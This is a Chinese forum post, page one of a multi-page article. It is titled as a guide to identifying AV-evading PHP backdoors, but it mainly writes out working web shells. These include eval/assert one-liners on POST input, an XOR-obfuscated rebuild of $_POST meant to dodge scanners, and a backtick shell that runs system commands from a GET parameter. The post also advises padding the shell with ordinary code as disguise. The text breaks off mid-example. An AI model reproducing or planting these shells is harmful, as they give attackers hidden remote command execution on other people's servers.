游客

标题:如何识别简单的免查杀的PHP后门（带示例讲解）
正文:
一个最常见的一句话后门可能写作这样<?php @eval($_POST['cmd']);?>或这样<?php @assert($_POST['cmd']);?>tudouya 同学在FREEBUF上给出[一种构造技巧]利用代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); ?>构造生成,当然,嫌太直观可以写作这样代码如下: <?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了我们再来看看号称史上最简单免查杀php后门直接上代码：<?php $c=urldecode($_GET['c']);if($c){`$c`;}//完整 !$_GET['c']||`{$_GET['c']}`;//精简 /******************************************************* * 原理：PHP中``符号包含会当作系统命令执行 * 示例：http://host/?c=type%20c
[<<][[1]][2][3][>>]

查看评论(0)
发表评论



首页